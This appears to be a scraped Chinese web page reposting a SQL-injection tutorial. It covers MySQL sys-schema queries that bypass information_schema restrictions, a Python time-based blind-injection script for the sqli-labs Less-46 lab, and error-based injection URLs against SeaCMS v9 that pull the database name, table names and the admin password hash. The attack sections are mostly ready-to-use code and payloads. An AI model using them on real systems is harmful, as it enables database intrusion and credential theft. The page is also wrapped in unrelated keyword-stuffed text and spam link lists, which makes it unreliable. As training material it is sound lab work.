当前位置: 首页 > wzjs >正文

江苏省宿迁市建设局网站首页wordpress 托管建站

江苏省宿迁市建设局网站首页,wordpress 托管建站,为何网站建设公司报价不同,百度关键词搜索一:information_schema绕过 1,、sys数据库包含了许多视图,这些视图整合了来自information_schema和performance_schema的数据,攻击者可以利用这些视图来获取数据库结构信息。 -- 获取所有数据库名 SELECT DISTINCT table_schema FROM sys.schema_table_…

一:information_schema绕过

1,、sys数据库包含了许多视图,这些视图整合了来自information_schema和performance_schema的数据,攻击者可以利用这些视图来获取数据库结构信息。
-- 获取所有数据库名
SELECT DISTINCT table_schema FROM sys.schema_table_statistics;

-- 获取指定数据库中的所有表名
SELECT table_name FROM sys.schema_table_statistics WHERE table_schema = 'your_database_name';

-- 获取指定表的所有列名
SELECT column_name 
FROM sys.digest_columns 
WHERE schema_name = 'your_database_name' AND table_name = 'your_table_name';
2、攻击者可以通过sys数据库中的一些视图来获取用户和权限相关的信息。
-- 获取用户和权限信息
SELECT user, host, authentication_string 
FROM sys.user_summary 
WHERE user != 'root';
3、攻击者可以将对sys数据库视图的查询与正常业务查询进行联合,以绕过一些简单的安全检测机制。
SELECT id, username FROM users 
UNION 
SELECT table_schema, table_name FROM sys.schema_table_statistics;
4、攻击者可以利用sys数据库视图的查询结果进行盲注攻击,逐步获取敏感信息。
-- 假设存在一个用户登录验证的漏洞
SELECT * FROM users WHERE username = 'admin' AND password = '' 
AND (SELECT COUNT(*) FROM sys.schema_table_statistics WHERE table_schema = 'your_database_name') > 0;
5、sys 数据库中的某些视图可以提供关于索引的详细信息,攻击者可以利用这些视图绕过对 information_schema.statistics 的直接访问限制来获取索引信息。
-- 获取指定数据库中表的索引信息
SELECT index_name, table_name, column_name
FROM sys.schema_index_statistics
WHERE table_schema = 'your_database_name';
6、攻击者可以通过分析 sys 数据库中一些反映数据库活动和性能的视图,间接推测出数据库的数据字典信息,即使不能直接获取到完整的表结构和列信息,也能得到一些有价值的线索。
-- 通过查看表的读写统计信息推测表的重要性和大致结构
SELECT table_schema, table_name, rows_fetched, rows_inserted, rows_updated, rows_deleted
FROM sys.schema_table_statistics
WHERE table_schema = 'your_database_name';

二:order by的注入

import requests
import time

def inject_username(url):
    username = ''
    for i in range(1, 50):  # 假设用户名最长为 50 个字符
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            # 构造时间盲注 payload
            payload = f"if((ascii(substr((SELECT username FROM users LIMIT 0,1),%d,1))>%d),sleep(1),1)" % (i, mid)
            # 传参
            params = {"sort": payload}
            start_time = time.time()
            # 异常处理
            try:
                r = requests.get(url, params=params, timeout=20)
            except requests.Timeout:
                print("Request timed out.")
                continue
            end_time = time.time()
            if end_time - start_time >= 1:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        username += chr(mid)
    print(f"最终获取到的用户名: {username}")

if __name__ == "__main__":
    url = 'http://127.0.0.1/sqli-labs-php7/Less-46/index.php'
    inject_username(url)

确定注入点:代码中通过 sort 参数进行注入,将构造的时间盲注 payload 传递给该参数。
时间盲注原理:利用 if 函数和 sleep 函数,根据数据库响应时间来判断条件是否成立,从而逐字符获取所需信息。

三:seacsmv9报错注入

seacmsv9漏洞文件:./comment/api/index.php

漏洞参数:$rlist

漏洞的源代码:

 session_start();
 require_once("../../include/common.php");
 $id = (isset($gid) && is_numeric($gid)) ? $gid : 0;
 $page = (isset($page) && is_numeric($page)) ? $page : 1;
 $type = (isset($type) && is_numeric($type)) ? $type : 1;
 $pCount = 0;
 $jsoncachefile = sea_DATA."/cache/review/$type/$id.js";
 //缓存第一页的评论
 if($page<2)
 {
         if(file_exists($jsoncachefile))
         {
                 $json=LoadFile($jsoncachefile);
                 die($json);
         }
 }
 $h = ReadData($id,$page);
 $rlist = array();
 if($page<2)
 {
         createTextFile($h,$jsoncachefile);
 }
 die($h);        
  
 function ReadData($id,$page)
 {
         global $type,$pCount,$rlist;
         $ret = array("","",$page,0,10,$type,$id);
         if($id>0)
         {
                 $ret[0] = Readmlist($id,$page,$ret[4]);
                 $ret[3] = $pCount;
                 $x = implode(',',$rlist);
                 if(!empty($x))
                 {
                 $ret[1] = Readrlist($x,1,10000);
                 }
         }
         $readData = FormatJson($ret);
         return $readData;
 }
  
 function Readmlist($id,$page,$size)
 {
         global $dsql,$type,$pCount,$rlist;
         $ml=array();
         if($id>0)
         {
                 $sqlCount = "SELECT count(*) as dd FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC";
                 $rs = $dsql ->GetOne($sqlCount);
                 $pCount = ceil($rs['dd']/$size);
                 $sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC limit ".($page-1)*$size.",$size ";
                 $dsql->setQuery($sql);
                 $dsql->Execute('commentmlist');
                 while($row=$dsql->GetArray('commentmlist'))
                 {
                         $row['reply'].=ReadReplyID($id,$row['reply'],$rlist);
                         $ml[]="{\"cmid\":".$row['id'].",\"uid\":".$row['uid'].",\"tmp\":\"\",\"nick\":\"".$row['username']."\",\"face\":\"\",\"star\":\"\",\"anony\":".(empty($row['username'])?1:0).",\"from\":\"".$row['username']."\",\"time\":\"".date("Y/n/j H:i:s",$row['dtime'])."\",\"reply\":\"".$row['reply']."\",\"content\":\"".$row['msg']."\",\"agree\":".$row['agree'].",\"aginst\":".$row['anti'].",\"pic\":\"".$row['pic']."\",\"vote\":\"".$row['vote']."\",\"allow\":\"".(empty($row['anti'])?0:1)."\",\"check\":\"".$row['ischeck']."\"}";
                 }
         }
         $readmlist=join($ml,",");
         return $readmlist;
 }
  
 function Readrlist($ids,$page,$size)
 {
         global $dsql,$type;
         $rl=array();
         $sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND id in ($ids) ORDER BY id DESC";
         $dsql->setQuery($sql);
         $dsql->Execute('commentrlist');
         while($row=$dsql->GetArray('commentrlist'))
         {
                 $rl[]="\"".$row['id']."\":{\"uid\":".$row['uid'].",\"tmp\":\"\",\"nick\":\"".$row['username']."\",\"face\":\"\",\"star\":\"\",\"anony\":".(empty($row['username'])?1:0).",\"from\":\"".$row['username']."\",\"time\":\"".$row['dtime']."\",\"reply\":\"".$row['reply']."\",\"content\":\"".$row['msg']."\",\"agree\":".$row['agree'].",\"aginst\":".$row['anti'].",\"pic\":\"".$row['pic']."\",\"vote\":\"".$row['vote']."\",\"allow\":\"".(empty($row['anti'])?0:1)."\",\"check\":\"".$row['ischeck']."\"}";
         }
         $readrlist=join($rl,",");
         return $readrlist;
 }

注入风险:($id、$page 和 $type 这些变量被直接用于 SQL 查询语句中,并且代码仅对这些变量进行了简单的 is_numeric 检查,没有对输入进行严格的过滤和转义处理,这就可能导致 SQL 注入漏洞。)

$sqlCount = "SELECT count(*) as dd FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC";


$sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC limit ".($page - 1) * $size.",$size ";


$sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND id in ($ids) ORDER BY id DESC";

报错数据库名:

http://seacmsv9:8015/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`'`,extractvalue(1,concat_ws(0x7e,0x7e,database())),@`'`

报错表名:

http://seacmsv9:8015/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`%27`,%20extractvalue(1,concat_ws(0x7e,0x7e,(select%23%0atable_name%20from%23%0ainformation_schema.tables%20where%20table_schema%20=0x736561636d73%20limit%200,1))),%20@`%27`

因是表sea_comment为空,无返回值
在表sea_comment插入数据,再次注入查看

http://seacmsv9:8015//comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`'`, updatexml
(1,concat_ws(0x20,0x5c,(select password from%23%0asea_admin limit 0,1)),1), @`'`

进入MD5解密后得到


文章转载自:

http://BBIW9Kfe.wpqwk.cn
http://hSkAvRrX.wpqwk.cn
http://0hbNs8iS.wpqwk.cn
http://ZImMi2Su.wpqwk.cn
http://mmKzKl9i.wpqwk.cn
http://p3ewjHp8.wpqwk.cn
http://4NYY99Fy.wpqwk.cn
http://Y4zIGwnf.wpqwk.cn
http://AsXnS7Jq.wpqwk.cn
http://xQiAOJPH.wpqwk.cn
http://ZwPGlQTb.wpqwk.cn
http://CUqbdnb0.wpqwk.cn
http://khG1JDnh.wpqwk.cn
http://B3uE4nmw.wpqwk.cn
http://2HzlBAY9.wpqwk.cn
http://RnYmmNR6.wpqwk.cn
http://M0Mr9XZB.wpqwk.cn
http://X9EieSwp.wpqwk.cn
http://xbJhJTo3.wpqwk.cn
http://6hXaNwi4.wpqwk.cn
http://L87qG0zD.wpqwk.cn
http://FEv6RIKA.wpqwk.cn
http://0Sp1iGgF.wpqwk.cn
http://shAl7kiC.wpqwk.cn
http://70R1P7v8.wpqwk.cn
http://fT24hlhP.wpqwk.cn
http://rUEkJ23u.wpqwk.cn
http://XUVEUrOW.wpqwk.cn
http://8tQsD8Tn.wpqwk.cn
http://mXN9UmKA.wpqwk.cn
http://www.dtcms.com/wzjs/726378.html

相关文章:

  • 二手东西网站怎么做高端品牌鞋子
  • 江门网站建设推广平台go语言 网站开发
  • 海关网站建设方案wordpress备份数据
  • 如何分析一个网站永州本地网站建设
  • 手机商城网站源码苏州网络技术有限公司
  • 网站建设可以帮助企业网站建设财务处理
  • 西安网站建设网络公司熊掌号网站按钮设计成什么颜色原因
  • 建设网站有哪些方法有哪些哪个网站做超链接
  • 纺织厂网站模板网站的备案号在哪
  • 旅游网站系统的设计与实现标签式网站内容管理
  • 电商网站改版思路濮阳
  • 义乌公司做网站企业型网站建设制作平台
  • wordpress单用户案例seo网络推广外包公司
  • 银川网站建设价格网络广告推广的兼职
  • 旧家电回收网站开发如何把php做的网站做成app
  • 在线音乐网站源码专业app网站建设
  • 南通市建设局网站6河北京电电力建设有限公司网站
  • 网站开发分类现在的网站开发都用什么开发
  • 专业网站制作的公司哪家好嘉兴高端建站公司
  • 网站建设公司美工如何找游艇 高端网站建设
  • 企业宣传网站案例网站建设后台有哪些项目
  • 上海建设机械网站桂林旅游几月份去最好
  • 瑞安网站设计义乌的论坛网站建设
  • 招投标建设网站的网站wordpress 技术类模板下载
  • 飘仙建站论坛直播型网站开发
  • 包头做网站建设银行个人网站官网
  • 提交网站到谷歌网站建设进度以及具体内容
  • 做家教有哪些比较好的网站wordpress获取动态页面
  • 昆山企业网站制作公司数码网站建设
  • 舆情监控系统网站打开速度慢优化